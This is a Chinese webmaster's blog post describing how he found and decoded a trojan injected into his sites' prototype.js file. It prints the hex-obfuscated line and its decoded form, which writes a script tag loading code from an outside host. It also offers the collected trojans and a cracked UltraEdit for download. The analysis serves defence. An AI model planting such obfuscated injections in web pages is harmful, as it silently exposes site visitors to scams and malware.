解密x64x6fx63x75x6dx65x6ex74木马的全过程

一、因为最近工作很忙，没有去看服务器，今天一个朋友跟我说ip8000.com、sql8.net中毒了，状况如下，



是一个QQ诈骗广告，于是我想应该是被挂马了上，用基本方法在源码里面搜索了一下没有， 我想不是我IIS中毒了？于是又打开了nz.gdm.cn一样中毒,不过我再打开我服务器其它网站却没有中毒那么就否定了服务器IIS中毒的可能，因为IIS中毒你服务器上都网站状况一样,那么确定是被挂马了。


那么木马又放在那里，木马的源代码又是什么呢？


二、我打开FTP工具，查看了一下最近被改过的文件，如图




于是我其它下载下来，
用工具打开来仔细看了一下，发现其中有一段很奇怪的代码
window["/x64/x6f/x63/x75/x6d/x65/x6e/x74"]["/x77/x72/x69/x74/x65"] ('/x3c/x53/x43/x52/x49/x50/x54 /x73/x72/x63

/x3d/x22/x68/x74/x74/x70/x3a/x2f/x2f/x77/x77/x77/x2e/x71/x71/x76/x69/x70/x2d/x31/x30/x30/x30/x30/x2e/x63

/x6f/x6d/x3a/x33/x31/x35/x38/x2f/x72/x65/x67/x2f/x63/x6f/x64/x65/x2e/x6a/x73/x22/x3e/x3c/x2f/x73/x63/x72/x69

/x70/x74/x3e');




  
这段代码是在prototype.js 这个文件，而这个文件是动易系统中javascript基础类库不应该存这样的代码，肯定是木马无疑了问题这样一个加了密码的代码我们要怎么去看它呢。


三、用百度搜了一下一位仁兄写的详细表示敬意我贴出他的地址http://tech.techweb.com.cn/thread-236233-1-.html
最重要的Uedit32（如果你没有没有关系下面我提供破解中文版供大家下载）




搜索-替换

把/x替换为%，然后用html代码转换功能，解码，
如图




  


四、终于看到庐山真面目了，代码是
window["document"]["write"] ('<SCRIPT src="http://www.qqvip-10000.com:3158/reg/code.js"></script>');
window["document"]["write"] ('<SCRIPT src="http://www.qqvip-10000.com:3158/reg/code.js"></script>');



以上就是解密这个木马的全部过程。
顺便我再把我服务器上找到的那些混蛋留下的木马也提供给大家下载学习，我们要自强不息，努力学习，不要他妈的天天给人强奸，我们可以不懂，但我们不可以不学,有兴趣的朋友欢迎加我的群8775455，希望各位穷光蛋站长们个个有米进,不说了，要去打补丁了。谢谢

点击下载挂马木马仅学习

点击下载UltraEdit简体中文破解版

  
本文来至E学院 原文地址：http://www.ip8000.com/NetworkSecurity/NetworkSecurity/201012/66887.html